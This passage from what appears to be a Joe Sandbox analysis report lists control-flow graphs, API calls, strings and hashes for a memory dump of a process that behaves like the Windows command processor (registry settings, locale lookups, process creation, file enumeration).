7ff7823ebddf-7ff7823ebdeb towlower 353->354 355 7ff7823ebdd9-7ff7823ebddd 353->355 359 7ff7823ebdee-7ff7823ebe0f iswdigit 354->359 355->359 356->337 360 7ff7823dac1a-7ff7823dac33 memset 356->360 357->249 358->286 363 7ff7823ebe11-7ff7823ebe15 359->363 364 7ff7823ebe17-7ff7823ebe23 towlower 359->364 360->309 365 7ff7823dac35-7ff7823dac4b wcschr 360->365 366 7ff7823ebe26-7ff7823ebe45 call 7ff7823e13e0 363->366 364->366 365->309 367 7ff7823dac4d-7ff7823dac54 365->367 366->333 368 7ff7823dad72-7ff7823dad91 wcschr 367->368 369 7ff7823dac5a-7ff7823dac6f wcschr 367->369 371 7ff7823daf03-7ff7823daf07 368->371 372 7ff7823dad97-7ff7823dadac wcschr 368->372 369->309 369->368 371->309 372->371 373 7ff7823dadb2-7ff7823dadc7 wcschr 372->373 373->371 374 7ff7823dadcd-7ff7823dade2 wcschr 373->374 374->371 375 7ff7823dade8-7ff7823dadfd wcschr 374->375 375->371 376 7ff7823dae03-7ff7823dae18 wcschr 375->376 376->371 377 7ff7823dae1e-7ff7823dae21 376->377 378 7ff7823dae24-7ff7823dae27 377->378 378->371 379 7ff7823dae2d-7ff7823dae40 iswspace 378->379 380 7ff7823dae42-7ff7823dae49 379->380 381 7ff7823dae4b-7ff7823dae5e 379->381 380->378 382 7ff7823dae66-7ff7823dae6d 381->382 382->382 383 7ff7823dae6f-7ff7823dae77 382->383 383->258 384 7ff7823dae7d-7ff7823dae97 call 7ff7823e13e0 383->384 387 7ff7823dae9a-7ff7823daea4 384->387 388 7ff7823daea6-7ff7823daead 387->388 389 7ff7823daebc-7ff7823daef8 call 7ff7823e0a6c call 7ff7823dff70 * 2 387->389 388->389 390 7ff7823daeaf-7ff7823daeba 388->390 389->317 397 7ff7823daefe 389->397 390->387 390->389 397->284
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: wcschr$Heap$AllocProcessiswspacememsettowlowerwcsrchr
                                                                                                  • String ID: :$:$:$:ON$OFF
                                                                                                  • API String ID: 972821348-467788257
                                                                                                  • Opcode ID: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
                                                                                                  • Instruction ID: 4a7e53762f0a869fec2d6f8f4a0b61da8195ee142f5ac8839a682d2addbe7c28
                                                                                                  • Opcode Fuzzy Hash: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
                                                                                                  • Instruction Fuzzy Hash: DD22C565A0864395EB65BF21D524278EA91FF48B83FE88079C90E47F94DFBCA844C370

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 398 7ff7823e51ec-7ff7823e5248 call 7ff7823e5508 GetLocaleInfoW 401 7ff7823eef32-7ff7823eef3c 398->401 402 7ff7823e524e-7ff7823e5272 GetLocaleInfoW 398->402 405 7ff7823eef3f-7ff7823eef49 401->405 403 7ff7823e5274-7ff7823e527a 402->403 404 7ff7823e5295-7ff7823e52b9 GetLocaleInfoW 402->404 406 7ff7823e5280-7ff7823e5286 403->406 407 7ff7823e54f7-7ff7823e54f9 403->407 408 7ff7823e52bb-7ff7823e52c3 404->408 409 7ff7823e52de-7ff7823e5305 GetLocaleInfoW 404->409 410 7ff7823eef61-7ff7823eef6c 405->410 411 7ff7823eef4b-7ff7823eef52 405->411 406->407 413 7ff7823e528c-7ff7823e528f 406->413 407->401 414 7ff7823eef75-7ff7823eef78 408->414 415 7ff7823e52c9-7ff7823e52d7 408->415 416 7ff7823e5321-7ff7823e5343 GetLocaleInfoW 409->416 417 7ff7823e5307-7ff7823e531b 409->417 410->414 411->410 412 7ff7823eef54-7ff7823eef5f 411->412 412->405 412->410 413->404 418 7ff7823eef99-7ff7823eefa3 414->418 419 7ff7823eef7a-7ff7823eef7d 414->419 415->409 420 7ff7823eefaf-7ff7823eefb9 416->420 421 7ff7823e5349-7ff7823e536e GetLocaleInfoW 416->421 417->416 418->420 419->409 424 7ff7823eef83-7ff7823eef8d 419->424 425 7ff7823eefbc-7ff7823eefc6 420->425 422 7ff7823e5374-7ff7823e5396 GetLocaleInfoW 421->422 423 7ff7823eeff2-7ff7823eeffc 421->423 427 7ff7823ef035-7ff7823ef03f 422->427 428 7ff7823e539c-7ff7823e53be GetLocaleInfoW 422->428 426 7ff7823eefff-7ff7823ef009 423->426 424->418 429 7ff7823eefde-7ff7823eefe9 425->429 430 7ff7823eefc8-7ff7823eefcf 425->430 431 7ff7823ef021-7ff7823ef02c 426->431 432 7ff7823ef00b-7ff7823ef012 426->432 435 7ff7823ef042-7ff7823ef04c 427->435 433 7ff7823e53c4-7ff7823e53e6 GetLocaleInfoW 428->433 434 7ff7823ef078-7ff7823ef082 428->434 429->423 430->429 436 7ff7823eefd1-7ff7823eefdc 430->436 431->427 432->431 437 7ff7823ef014-7ff7823ef01f 432->437 438 7ff7823e53ec-7ff7823e540e GetLocaleInfoW 433->438 439 7ff7823ef0bb-7ff7823ef0c5 433->439 442 7ff7823ef085-7ff7823ef08f 434->442 440 7ff7823ef064-7ff7823ef06f 435->440 441 7ff7823ef04e-7ff7823ef055 435->441 436->425 436->429 437->426 437->431 444 7ff7823e5414-7ff7823e5436 GetLocaleInfoW 438->444 445 7ff7823ef0fe-7ff7823ef108 438->445 443 7ff7823ef0c8-7ff7823ef0d2 439->443 440->434 441->440 446 7ff7823ef057-7ff7823ef062 441->446 447 7ff7823ef091-7ff7823ef098 442->447 448 7ff7823ef0a7-7ff7823ef0b2 442->448 449 7ff7823ef0d4-7ff7823ef0db 443->449 450 7ff7823ef0ea-7ff7823ef0f5 443->450 451 7ff7823ef141-7ff7823ef14b 444->451 452 7ff7823e543c-7ff7823e545e GetLocaleInfoW 444->452 453 7ff7823ef10b-7ff7823ef115 445->453 446->435 446->440 447->448 454 7ff7823ef09a-7ff7823ef0a5 447->454 448->439 449->450 455 7ff7823ef0dd-7ff7823ef0e8 449->455 450->445 460 7ff7823ef14e-7ff7823ef158 451->460 456 7ff7823e5464-7ff7823e5486 GetLocaleInfoW 452->456 457 7ff7823ef184-7ff7823ef18b 452->457 458 7ff7823ef12d-7ff7823ef138 453->458 459 7ff7823ef117-7ff7823ef11e 453->459 454->442 454->448 455->443 455->450 462 7ff7823ef1c4-7ff7823ef1ce 456->462 463 7ff7823e548c-7ff7823e54ae GetLocaleInfoW 456->463 461 7ff7823ef18e-7ff7823ef198 457->461 458->451 459->458 464 7ff7823ef120-7ff7823ef12b 459->464 465 7ff7823ef170-7ff7823ef17b 460->465 466 7ff7823ef15a-7ff7823ef161 460->466 468 7ff7823ef1b0-7ff7823ef1bb 461->468 469 7ff7823ef19a-7ff7823ef1a1 461->469 472 7ff7823ef1d1-7ff7823ef1db 462->472 470 7ff7823e54b4-7ff7823e54f5 setlocale call 7ff7823e8f80 463->470 471 7ff7823ef207-7ff7823ef20e 463->471 464->453 464->458 465->457 466->465 467 7ff7823ef163-7ff7823ef16e 466->467 467->460 467->465 468->462 469->468 474 7ff7823ef1a3-7ff7823ef1ae 469->474 473 7ff7823ef211-7ff7823ef21b 471->473 476 7ff7823ef1f3-7ff7823ef1fe 472->476 477 7ff7823ef1dd-7ff7823ef1e4 472->477 478 7ff7823ef233-7ff7823ef23e 473->478 479 7ff7823ef21d-7ff7823ef224 473->479 474->461 474->468 476->471 477->476 481 7ff7823ef1e6-7ff7823ef1f1 477->481 479->478 482 7ff7823ef226-7ff7823ef231 479->482 481->472 481->476 482->473 482->478
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InfoLocale$DefaultUsersetlocale
                                                                                                  • String ID: .OCP$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
                                                                                                  • API String ID: 1351325837-2236139042
                                                                                                  • Opcode ID: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                                                                                  • Instruction ID: 1b4550147cb6ddf8cda9f0308d50090654fb4eeac9d8d6c3e1876942f8997a16
                                                                                                  • Opcode Fuzzy Hash: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                                                                                  • Instruction Fuzzy Hash: 91F18069B0474295EF51AF11D5202B9B6A4FF08B82FE44179CA0D53B94EFBCE94AC330

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 483 7ff7823e4224-7ff7823e42a5 InitializeProcThreadAttributeList 484 7ff7823eecd4-7ff7823eecee GetLastError call 7ff7823f9eec 483->484 485 7ff7823e42ab-7ff7823e42e5 UpdateProcThreadAttribute 483->485 493 7ff7823eed1e 484->493 486 7ff7823eecf0-7ff7823eed19 GetLastError call 7ff7823f9eec DeleteProcThreadAttributeList 485->486 487 7ff7823e42eb-7ff7823e43c6 memset * 2 GetStartupInfoW call 7ff7823e3a90 call 7ff7823db900 485->487 486->493 497 7ff7823e43cc-7ff7823e43d3 487->497 498 7ff7823e4638-7ff7823e4644 _local_unwind 487->498 499 7ff7823e4649-7ff7823e4650 497->499 500 7ff7823e43d9-7ff7823e43dc 497->500 498->499 499->500 503 7ff7823e4656-7ff7823e465d 499->503 501 7ff7823e4415-7ff7823e4424 call 7ff7823e5a68 500->501 502 7ff7823e43de-7ff7823e43f5 wcsrchr 500->502 510 7ff7823e442a-7ff7823e4486 CreateProcessW 501->510 511 7ff7823e4589-7ff7823e4590 501->511 502->501 504 7ff7823e43f7-7ff7823e440f lstrcmpW 502->504 503->501 506 7ff7823e4663 503->506 504->501 507 7ff7823e4668-7ff7823e466d call 7ff7823f9044 504->507 506->500 507->501 514 7ff7823e448b-7ff7823e448f 510->514 511->510 512 7ff7823e4596-7ff7823e45fa CreateProcessAsUserW 511->512 512->514 515 7ff7823e4495-7ff7823e44c7 CloseHandle call 7ff7823e498c 514->515 516 7ff7823e4672-7ff7823e4682 GetLastError 514->516 519 7ff7823e468d-7ff7823e4694 515->519 520 7ff7823e44cd-7ff7823e44e5 515->520 516->519 521 7ff7823e4696-7ff7823e46a0 519->521 522 7ff7823e46a2-7ff7823e46ac 519->522 523 7ff7823e47a3-7ff7823e47a9 520->523 524 7ff7823e44eb-7ff7823e44f2 520->524 521->522 525 7ff7823e46ae-7ff7823e46b5 call 7ff7823e97bc 521->525 522->525 526 7ff7823e4705-7ff7823e4707 522->526 527 7ff7823e45ff-7ff7823e4607 524->527 528 7ff7823e44f8-7ff7823e4507 524->528 540 7ff7823e4703 525->540 541 7ff7823e46b7-7ff7823e4701 call 7ff78242c038 525->541 526->520 530 7ff7823e470d-7ff7823e472a call 7ff7823dcd90 526->530 527->528 531 7ff7823e460d 527->531 532 7ff7823e4612-7ff7823e4616 528->532 533 7ff7823e450d-7ff7823e4553 call 7ff7823e5cb4 call 7ff7823e33f0 call 7ff7823e498c 528->533 548 7ff7823e472c-7ff7823e4738 _local_unwind 530->548 549 7ff7823e473d-7ff7823e4767 call 7ff7823e13e0 call 7ff7823f9eec call 7ff7823dff70 _local_unwind 530->549 536 7ff7823e476c-7ff7823e4773 531->536 538 7ff7823e461c-7ff7823e4633 532->538 539 7ff7823e47d7-7ff7823e47df 532->539 565 7ff7823e4558-7ff7823e455e 533->565 536->528 546 7ff7823e4779-7ff7823e4780 536->546 543 7ff7823e47f2-7ff7823e483c call 7ff7823dff70 DeleteProcThreadAttributeList call 7ff7823e8f80 538->543 539->543 544 7ff7823e47e1-7ff7823e47ed CloseHandle 539->544 540->526 541->526 544->543 546->528 553 7ff7823e4786-7ff7823e4789 546->553 548->549 549->536 553->528 558 7ff7823e478f-7ff7823e4792 553->558 558->523 562 7ff7823e4794-7ff7823e479d call 7ff7823fa250 558->562 562->523 562->528 568 7ff7823e4564-7ff7823e4579 call 7ff7823e498c 565->568 569 7ff7823e47ae-7ff7823e47ca call 7ff7823e33f0 565->569 568->543 576 7ff7823e457f-7ff7823e4584 call 7ff7823fa920 568->576 569->539 576->543
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AttributeProcThread$List$CloseCreateDeleteErrorHandleLastProcessmemsetwcsrchr$InfoInitializeStartupUpdateUser_local_unwind_wcsnicmplstrcmp
                                                                                                  • String ID: %01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$\XCOPY.EXE$h
                                                                                                  • API String ID: 388421343-2905461000
                                                                                                  • Opcode ID: 55d34b9fbbbe98a267e2a1b689c77e543e9d7ab297a27b4d624c1a5c7cdf6f16
                                                                                                  • Instruction ID: 45153a5da332e9f13f90a9b4cc20274975fdf5eafc6591f100395bdc5d5849e0
                                                                                                  • Opcode Fuzzy Hash: 55d34b9fbbbe98a267e2a1b689c77e543e9d7ab297a27b4d624c1a5c7cdf6f16
                                                                                                  • Instruction Fuzzy Hash: E9F14235A18B8295E760AB11E4507BAF7A4FF89742FA04179DA4D43F54DFBCE448CB20

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 579 7ff7823e5554-7ff7823e55b9 call 7ff7823ea640 582 7ff7823e55bc-7ff7823e55e8 RegOpenKeyExW 579->582 583 7ff7823e55ee-7ff7823e5631 RegQueryValueExW 582->583 584 7ff7823e5887-7ff7823e588e 582->584 585 7ff7823e5637-7ff7823e5675 RegQueryValueExW 583->585 586 7ff7823ef248-7ff7823ef24d 583->586 584->582 587 7ff7823e5894-7ff7823e58db time srand call 7ff7823e8f80 584->587 588 7ff7823e568e-7ff7823e56cc RegQueryValueExW 585->588 589 7ff7823e5677-7ff7823e567c 585->589 591 7ff7823ef24f-7ff7823ef25b 586->591 592 7ff7823ef260-7ff7823ef265 586->592 595 7ff7823ef2b6-7ff7823ef2bb 588->595 596 7ff7823e56d2-7ff7823e5710 RegQueryValueExW 588->596 593 7ff7823e5682-7ff7823e5687 589->593 594 7ff7823ef28b-7ff7823ef290 589->594 591->585 592->585 598 7ff7823ef26b-7ff7823ef286 _wtol 592->598 593->588 594->588 601 7ff7823ef296-7ff7823ef2b1 _wtol 594->601 602 7ff7823ef2bd-7ff7823ef2c9 595->602 603 7ff7823ef2ce-7ff7823ef2d3 595->603 599 7ff7823e5712-7ff7823e5717 596->599 600 7ff7823e5729-7ff7823e5767 RegQueryValueExW 596->600 598->585 605 7ff7823e571d-7ff7823e5722 599->605 606 7ff7823ef2f9-7ff7823ef2fe 599->606 607 7ff7823e579f-7ff7823e57dd RegQueryValueExW 600->607 608 7ff7823e5769-7ff7823e576e 600->608 601->588 602->596 603->596 604 7ff7823ef2d9-7ff7823ef2f4 _wtol 603->604 604->596 605->600 606->600 609 7ff7823ef304-7ff7823ef31a wcstol 606->609 612 7ff7823e57e3-7ff7823e57e8 607->612 613 7ff7823ef3a9 607->613 610 7ff7823e5774-7ff7823e578f 608->610 611 7ff7823ef320-7ff7823ef325 608->611 609->611 616 7ff7823e5795-7ff7823e5799 610->616 617 7ff7823ef357-7ff7823ef35e 610->617 614 7ff7823ef34b 611->614 615 7ff7823ef327-7ff7823ef33f wcstol 611->615 618 7ff7823ef363-7ff7823ef368 612->618 619 7ff7823e57ee-7ff7823e5809 612->619 620 7ff7823ef3b5-7ff7823ef3b8 613->620 614->617 615->614 616->607 616->617 617->607 621 7ff7823ef38e 618->621 622 7ff7823ef36a-7ff7823ef382 wcstol 618->622 623 7ff7823e580f-7ff7823e5813 619->623 624 7ff7823ef39a-7ff7823ef39d 619->624 625 7ff7823e582c 620->625 626 7ff7823ef3be-7ff7823ef3c5 620->626 621->624 622->621 623->624 627 7ff7823e5819-7ff7823e5823 623->627 624->613 629 7ff7823e5832-7ff7823e5870 RegQueryValueExW 625->629 630 7ff7823ef3ca-7ff7823ef3d1 625->630 626->629 627->620 628 7ff7823e5829 627->628 628->625 631 7ff7823e5876-7ff7823e5882 RegCloseKey 629->631 632 7ff7823ef3dd-7ff7823ef3e2 629->632 630->632 631->584 633 7ff7823ef433-7ff7823ef439 632->633 634 7ff7823ef3e4-7ff7823ef412 ExpandEnvironmentStringsW 632->634 633->631 635 7ff7823ef43f-7ff7823ef44c call 7ff7823db900 633->635 636 7ff7823ef414-7ff7823ef426 call 7ff7823e13e0 634->636 637 7ff7823ef428 634->637 635->631 640 7ff7823ef42e 636->640 637->640 640->633
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: QueryValue$CloseOpensrandtime
                                                                                                  • String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor
                                                                                                  • API String ID: 145004033-3846321370
                                                                                                  • Opcode ID: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                                                                                  • Instruction ID: cfb1b55e255c250bba52f146bca12e34ef3502b926dfafb88d1960a82abc946b
                                                                                                  • Opcode Fuzzy Hash: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                                                                                  • Instruction Fuzzy Hash: 00E1947651DA82D6E790AB10E45057AF7A0FB88742FE05135EA8E43E54DFFCD948CB20

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 821 7ff7823e37d8-7ff7823e3887 GetCurrentThreadId OpenThread call 7ff7823e04f4 HeapSetInformation RegOpenKeyExW 824 7ff7823e388d-7ff7823e38eb call 7ff7823e5920 GetConsoleOutputCP GetCPInfo 821->824 825 7ff7823ee9f8-7ff7823eea3b RegQueryValueExW RegCloseKey 821->825 828 7ff7823eea41-7ff7823eea59 GetThreadLocale 824->828 829 7ff7823e38f1-7ff7823e3913 memset 824->829 825->828 830 7ff7823eea74-7ff7823eea77 828->830 831 7ff7823eea5b-7ff7823eea67 828->831 832 7ff7823eeaa5 829->832 833 7ff7823e3919-7ff7823e3935 call 7ff7823e4d5c 829->833 834 7ff7823eea94-7ff7823eea96 830->834 835 7ff7823eea79-7ff7823eea7d 830->835 831->830 838 7ff7823eeaa8-7ff7823eeab4 832->838 842 7ff7823eeae2-7ff7823eeaff call 7ff7823d3240 call 7ff7823f8530 call 7ff7823e4c1c 833->842 843 7ff7823e393b-7ff7823e3942 833->843 834->832 835->834 837 7ff7823eea7f-7ff7823eea89 835->837 837->834 838->833 840 7ff7823eeaba-7ff7823eeac3 838->840 841 7ff7823eeacb-7ff7823eeace 840->841 844 7ff7823eeac5-7ff7823eeac9 841->844 845 7ff7823eead0-7ff7823eeadb 841->845 853 7ff7823eeb00-7ff7823eeb0d 842->853 847 7ff7823e3948-7ff7823e3962 _setjmp 843->847 848 7ff7823eeb27-7ff7823eeb40 _setjmp 843->848 844->841 845->838 851 7ff7823eeadd 845->851 847->853 854 7ff7823e3968-7ff7823e396d 847->854 849 7ff7823eeb46-7ff7823eeb49 848->849 850 7ff7823e39fe-7ff7823e3a05 call 7ff7823e4c1c 848->850 856 7ff7823eeb66-7ff7823eeb6f call 7ff7823e01b8 849->856 857 7ff7823eeb4b-7ff7823eeb65 call 7ff7823d3240 call 7ff7823f8530 call 7ff7823e4c1c 849->857 850->825 851->833 867 7ff7823eeb15-7ff7823eeb1f call 7ff7823e4c1c 853->867 859 7ff7823e396f 854->859 860 7ff7823e39b9-7ff7823e39bb 854->860 880 7ff7823eeb71-7ff7823eeb82 _setmode 856->880 881 7ff7823eeb87-7ff7823eeb89 call 7ff7823e86f0 856->881 857->856 868 7ff7823e3972-7ff7823e397d 859->868 863 7ff7823eeb20 860->863 864 7ff7823e39c1-7ff7823e39c3 call 7ff7823e4c1c 860->864 863->848 877 7ff7823e39c8 864->877 867->863 874 7ff7823e397f-7ff7823e3984 868->874 875 7ff7823e39c9-7ff7823e39de call 7ff7823ddf60 868->875 874->868 883 7ff7823e3986-7ff7823e39ae call 7ff7823e0580 GetConsoleOutputCP GetCPInfo call 7ff7823e04f4 874->883 875->867 891 7ff7823e39e4-7ff7823e39e8 875->891 877->875 880->881 888 7ff7823eeb8e-7ff7823eebad call 7ff7823e58e4 call 7ff7823ddf60 881->888 897 7ff7823e39b3 883->897 902 7ff7823eebaf-7ff7823eebb3 888->902 891->850 895 7ff7823e39ea-7ff7823e39ef call 7ff7823dbe00 891->895 900 7ff7823e39f4-7ff7823e39fc 895->900 897->860 900->874 902->850 903 7ff7823eebb9-7ff7823eec24 call 7ff7823e58e4 GetConsoleOutputCP GetCPInfo call 7ff7823e04f4 call 7ff7823dbe00 call 7ff7823e0580 GetConsoleOutputCP GetCPInfo call 7ff7823e04f4 902->903 903->888
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: QueryThread$ConsoleInfoOpenOutputVirtual$CloseCurrentHeapInformationLocaleValue_setjmpmemset
                                                                                                  • String ID: DisableCMD$Software\Policies\Microsoft\Windows\System
                                                                                                  • API String ID: 2624720099-1920437939
                                                                                                  • Opcode ID: 9a4cddc928fe4c71fd6c761995599b2788caccd561f5d3a8cbf937f1688b90ea
                                                                                                  • Instruction ID: a6f30f1346a20e5f13098fd28a7f24ccb631e9ec35c6971847cb159746e7c9a2
                                                                                                  • Opcode Fuzzy Hash: 9a4cddc928fe4c71fd6c761995599b2788caccd561f5d3a8cbf937f1688b90ea
                                                                                                  • Instruction Fuzzy Hash: 58C1AC25F086429AE750BB61E4602B8FBA0FF49712FF4417CD91E57E91DEBCA848C630

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1118 7ff7823e823c-7ff7823e829b FindFirstFileExW 1119 7ff7823e82cd-7ff7823e82df 1118->1119 1120 7ff7823e829d-7ff7823e82a9 GetLastError 1118->1120 1124 7ff7823e8365-7ff7823e837b FindNextFileW 1119->1124 1125 7ff7823e82e5-7ff7823e82ee 1119->1125 1121 7ff7823e82af 1120->1121 1122 7ff7823e82b1-7ff7823e82cb 1121->1122 1126 7ff7823e83d0-7ff7823e83e5 FindClose 1124->1126 1127 7ff7823e837d-7ff7823e8380 1124->1127 1128 7ff7823e82f1-7ff7823e82f4 1125->1128 1126->1128 1127->1119 1129 7ff7823e8386 1127->1129 1130 7ff7823e82f6-7ff7823e8300 1128->1130 1131 7ff7823e8329-7ff7823e832b 1128->1131 1129->1120 1133 7ff7823e8332-7ff7823e8353 GetProcessHeap HeapAlloc 1130->1133 1134 7ff7823e8302-7ff7823e830e 1130->1134 1131->1121 1132 7ff7823e832d 1131->1132 1132->1120 1135 7ff7823e8356-7ff7823e8363 1133->1135 1136 7ff7823e8310-7ff7823e8313 1134->1136 1137 7ff7823e838b-7ff7823e83c2 GetProcessHeap HeapReAlloc 1134->1137 1135->1136 1140 7ff7823e8315-7ff7823e8323 1136->1140 1141 7ff7823e8327 1136->1141 1138 7ff7823f50f8-7ff7823f511e GetLastError FindClose 1137->1138 1139 7ff7823e83c8-7ff7823e83ce 1137->1139 1138->1122 1139->1135 1140->1141 1141->1131
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
